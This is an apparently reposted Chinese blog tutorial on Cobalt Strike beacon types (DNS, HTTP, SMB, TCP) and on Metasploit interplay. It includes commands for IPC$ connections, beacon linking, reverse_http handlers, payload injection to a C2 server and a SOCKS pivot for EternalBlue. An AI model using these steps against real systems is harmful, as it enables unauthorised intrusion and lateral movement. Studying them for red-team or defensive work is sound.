Cobalt Strike -- 各种beacon

news2024/9/23 20:01:07

今天来讲一下cs里面的beacon

其实cs真的功能很强大,自带代理创建,自带beacon通信!!!

一张图,就能说明beacon的工作原理

1.Beacon 

每当有一台机器上线之后,我们都会选择sleep时间,并且进入会话,就是这样

 

可以看见,有一个beacon的字段,每一次我们敲命令的时候,都会再它之后,那么,什么是beacon呢?????

Beacon是Cobalt Strike为高级攻击者建模的Payload。使用Beacon通过HTTP,HTTPS或DNS出口网络。而且Beacon非常灵活,支持异步和交互式通信。异步通信既低又慢。Beacon将通讯本地,下载任务,然后进入睡眠状态。交互式通信实时发生。

在我们点击监听器的时候就能看见这个

下面我们就来分别讲讲这几种beacon的用法

2.DNS Beacon

DNS Beacon,顾名思义就是使用DNS请求将Beacon返回。这些 DNS 请求用于解析由你的 CS 团队服务器作为权威 DNS 服务器的域名。DNS 响应告诉 Beacon 休眠或是连接到团队服务器来下载任务。DNS 响应也告诉 Beacon 如何从你的团队服务器下载任务。

感觉有点听不懂??? 来看一张图片

当我们将dnsbeacon嵌入到靶机的一个程序时候,如果这个smbbeacon运行起来,就会逐级递归的去找我们的服务器,并且通过dns_txt的方式传输数据,缺点是这个会比常规的慢

3.HTTP/HTTPS Beacon

这两个beacon的原理是通过发送http请求与受害主机通信来传达命令, 以此实现控制效果

相比于HTTP的beacon ,HTTPS的beacon多了一个加密传输

配置呢也比较简单,就是绑个ip,然后设置一个端口就好

优点是传输数据快, 缺点是隐蔽性差, 容易被防火墙或内网审计工具拦截

4.SMB Beacon

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons连接后,子Beacon从父Beacon获取到任务并发送。

因为连接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。

在前面提到的三个beacon里面,都是只能用于出网的机器,SMB和TCPbeacon都可以用在不出网和出网的机器!!!

下面是它的原理

这样说起来好像有点干,来个拓扑环境演示一下

抽象点的拓扑

首先是把win7上线了,这个进入内网的第一步,不多说

然后设置smb beacon

然后生成一个多阶段的木马

然后不管通过什么方式,让这个木马丢到下一个目标的机器,并且让他运行起来!!! 

当然,你也要有一个ipc连接

net use \\目标ip\ipc$  "密码" /user:用户名

再link一下 

link 目标ip

就能上线到了 内网的server 

这时候有人就会问了,还能在跨一段网段吗???

肯定可以啊。我们再加一个网段

   还是建立连接,上马,运行,link

这样,就能上线三个网段的机器了(就算是有更多的网段,也是可以的,毕竟windows默认开放445端口,这就是为什么smb beacon 在内网中有奇效) 

不信??? 给你看一下更清晰的图,三层网段!!!!!!

5.TCP Beacon

TCPbeacon也是一般用在上线内网的机器,走的是tcp的协议

先去清空一下环境

创建一个TCP监听器

并且生成对应的stage木马,建立管道,运行

connect 目标ip 端口(一开始tcp监听器的木马)

但是呢???

牛魔的怎么连接不上??

哎,这,翻车了,但是网上说这样是可以的!!!!还是用回smb吧

6.联动beacon

这种beacon可以用于和msf梦幻联动!!!(之前讲过,再讲一遍)

cs(在不添加插件的情况下)的攻击性不强(相对于msf的众多攻击模块),所以我们很多时候就要联动

先去msfconsole监听(payload选reverse_http)

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lport kali的ip 
set lport 你自己写一个ip
run

再是监听器

spawn一下(前提你要有cs已经上线了机器)

成功上线 

但是,这样也只是联动(装装b还可以),还是没有用到kali的攻击模块,别急有反转!!

这里用到pivot模块,(其实就是把它当作一台开了socks服务的服务器)

开启服务

开始操作

复制下面这段话

回到msfconsole background一下

然后去敲上这条命令

setg Proxies socks4:192.168.246.153:20987
set ReverseAllowProxy true

然后你就可以用永恒之蓝打内网了

但是大部分都是不行的!!!! (看别人试过也是这样不行)一旦跨了一个网段,就是能扫出漏洞,但是打不进去(真的很奇怪)可能是虚拟机的问题吧!!

7.MSF联动CS

上面讲了cs联动msf,但是一般我们都是先上线msf,再上线的cs啊,别急,还是有反转!!!

我把上面那台打不到的机器放在了外网,瞬间就能打到了(大无语事件)

然后按照以下命令敲

bg

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set lhost "cs的ip"

set lport  "cs的端口"

set disablepayloadhandler true

run

然后去cs配置监听

然后就能上线了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1542673.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

PCI产业概述和产业发展动态分享

PCI产业概述和产业发展动态分享

atsec白海蔚 2024年3月底 关键词:支付卡产业、PCI DSS、数据安全、支付交易 本文为atsec和作者技术共享类文章,旨在共同探讨信息安全的相关话题。转载请注明:atsec和作者名称。 *如有兴趣了解早期产业信息请参见作者于2021年4月发布信息&a…
阅读更多...
数据在内存里面的存储

数据在内存里面的存储

学习流程 ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————…
阅读更多...
SOC子模块---RTC and watchdog

SOC子模块---RTC and watchdog

RTC RTC大致执行过程: 对SOC 中的锁相环或者外部晶振的时钟进行计数;产生时,分,秒的中断;送给中断控制器;中断控制器进行优先权选择后送给cpu;Cpu执行中断服务程序;在中断服务程序…
阅读更多...
吴恩达深度学习笔记:神经网络的编程基础2.15-2.17

吴恩达深度学习笔记:神经网络的编程基础2.15-2.17

目录 第一门课:神经网络和深度学习 (Neural Networks and Deep Learning)第二周:神经网络的编程基础 (Basics of Neural Network programming)2.15 Python 中的广播(Broadcasting in Python)2.16 关于 python _ numpy 向量的说明&…
阅读更多...
Java中的代理模式(动态代理和静态代理)

Java中的代理模式(动态代理和静态代理)

代理模式 我们先了解一下代理模式: 在开发中,当我们要访问目标类时,不是直接访问目标类,而是访问器代理类。通过代理类调用目标类完成操作。简单来说就是:把直接访问变为间接访问。 这样做的最大好处就是&#xff1a…
阅读更多...
UE5 LiveLink 自动连接数据源,以及打包后不能收到udp消息的解决办法

UE5 LiveLink 自动连接数据源,以及打包后不能收到udp消息的解决办法

为什么要自动连接数据源,因为方便打包后接收数据,这里我是写在了Game Instance,也可以写在其他地方,自行替换成Beginplay和Endplay 关于编辑器模式下能收到udp消息,打包后不能收到消息的问题有两点需要排查,启动打包后…
阅读更多...
数据结构·排序

数据结构·排序

1. 排序的概念及运用 1.1 排序的概念 排序:排序是将一组“无序”的记录序列,按照某个或某些关键字的大小,递增或递减归零调整为“有序”的记录序列的操作 稳定性:假定在待排序的记录序列中,存在多个具有相同关键字的记…
阅读更多...
大数据技术原理与应用 01.大数据概述

大数据技术原理与应用 01.大数据概述

不可以垂头丧气,会显矮 —— 24.3.24 参考学习:厦门大学 林子雨老师 大数据技术原理与应用 一、大数据时代 大数据概念、影响、应用、关键技术 大数据与云计算、物联网的关系 ①三次信息化浪潮时代 ②第三次信息化浪潮的技术支撑 1>存储设备容量不断…
阅读更多...
PWM实现电机的正反转和调速以及TIM定时器

PWM实现电机的正反转和调速以及TIM定时器

pwm.c #include "pwm.h"/* PWM --- PA2 --TIM2_CH3 //将电机信号控制一根接GND,一根接在PA2(TIM2_CH3), 输出PWM控制电机快慢 TIM2挂在APB1 定时器频率:84MHZ*/ void Pwm_Init(void) {GPIO_InitTypeDef GPIO_InitStruct;TIM_TimeBaseInitT…
阅读更多...
查询所有进程及线程端口占用情况,并关闭某端口的方法

查询所有进程及线程端口占用情况,并关闭某端口的方法

** 查询所有进程及线程端口占用情况,并关闭某端口的方法 ** 1、windows 查系统下( cmd 模式下): 1)查询当前系统所有网络连接和监听端口以及对应的进程标识(PID): netstat -aon…
阅读更多...
QT----基于QT的人脸考勤系统ubuntu系统运行,编译开发板

QT----基于QT的人脸考勤系统ubuntu系统运行,编译开发板

目录 1 Ubantu编译opencv和seetaface库1.1 Ubantu编译opencv1.2 Ubuntu编译seetaface1.3 安装qt 2 更改代码2.1 直接运行报错/usr/bin/ld: cannot find -lGL: No such file or directory2.2 遇到报错摄像头打不开2.3 修改部分代码2.4 解决中文语音输出问题 3 尝试交叉编译rk358…
阅读更多...
电脑哥的励志创业路:蹭别人的电脑做抖店

电脑哥的励志创业路:蹭别人的电脑做抖店

我是王路飞。 没有一步到位的创业项目,也没有一击必中的解决方法,有的只是需要时刻解决的当下问题。 做事/创业/成长/生活/人生,都不要追求百分百的圆满,不要抱有一帆风顺的幻想,不要期待十全十美的结果。 它们的第…
阅读更多...
毕业设计:日志记录编写(3/17起更新中)

毕业设计:日志记录编写(3/17起更新中)

目录 3/171.配置阿里云python加速镜像:2. 安装python3.9版本3. 爬虫技术选择4. 数据抓取和整理5. 难点和挑战 3/241.数据库建表信息2.后续进度安排3. 数据处理和分析 3/17 当前周期目标:构建基本的python环境:运行爬虫程序 1.配置阿里云pytho…
阅读更多...
使用GaLore在本地GPU进行高效的LLM调优

使用GaLore在本地GPU进行高效的LLM调优

训练大型语言模型(llm),即使是那些“只有”70亿个参数的模型,也是一项计算密集型的任务。这种水平的训练需要的资源超出了大多数个人爱好者的能力范围。为了弥补这一差距,出现了低秩适应(LoRA)等参数高效方法,可以在消费级gpu上对…
阅读更多...
【Canvas与艺术】暗蓝网格汽车速度仪表盘

【Canvas与艺术】暗蓝网格汽车速度仪表盘

【关键点】 采用线性渐变色&#xff0c;使上深下浅的圆有凹下效果&#xff0c;使上浅下深的圆有凸起效果&#xff0c;两者结合就有立体圆钮的感觉。 【图例】 【代码】 <!DOCTYPE html> <html lang"utf-8"> <meta http-equiv"Content-Type&quo…
阅读更多...
【Python机器学习系列】机器学习中的模型微调---随机搜索(案例+源码)

【Python机器学习系列】机器学习中的模型微调---随机搜索(案例+源码)

这是我的第245篇原创文章。 一、引言 如果探索的组合数量较少时&#xff0c;网格搜索是一种不错的方法&#xff0c;但当超参数的搜索范围较大时&#xff0c;通常会优先选择使用 RandomizedSearchCV 。它与 GridSearchCV 用法相似&#xff0c;但它不会尝试所有可能的组合&…
阅读更多...
华为升级FIT AP示例(通过AC的命令行)

华为升级FIT AP示例(通过AC的命令行)

升级FIT AP示例&#xff08;通过AC的命令行&#xff09; 前提条件 从官网下载升级目标版本对应的系统软件包&#xff0c;保存在PC本地。如果下载的文件是压缩文件&#xff0c;则需要解压缩出系统软件包。 AP已在WAC上线。 背景信息 升级的过程是先将系统软件包传到设备上&…
阅读更多...
微信小程序button动态跳转到页面

微信小程序button动态跳转到页面

微信小程序中如何动态的跳转到某个页面。 目录 1、首先在js文件中定义事件函数 2、在页面中进行传参调用 3、其它跳转方法简单说明 1、首先在js文件中定义事件函数 goto(e){const urle.currentTarget.dataset.url;wx.navigateTo({url: url})}, 2、在页面中进行传参调用 &l…
阅读更多...
C++之char16_t*与char*类型相互转换(二百六十)

C++之char16_t*与char*类型相互转换(二百六十)

简介&#xff1a; CSDN博客专家&#xff0c;专注Android/Linux系统&#xff0c;分享多mic语音方案、音视频、编解码等技术&#xff0c;与大家一起成长&#xff01; 优质专栏&#xff1a;Audio工程师进阶系列【原创干货持续更新中……】&#x1f680; 优质专栏&#xff1a;多媒…
阅读更多...
国内ip修改用什么软件下载?

国内ip修改用什么软件下载?

在特定情况下&#xff0c;可能需要修改你的国内IP地址以实现网络访问需求或绕过地域限制。许多软件和工具可以帮助你实现这一目标&#xff0c;无论是为了隐私保护还是访问特定内容。虎观代理小二将介绍一些推荐的软件下载途径&#xff0c;以便你修改国内IP地址。 1. IP代理软件…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023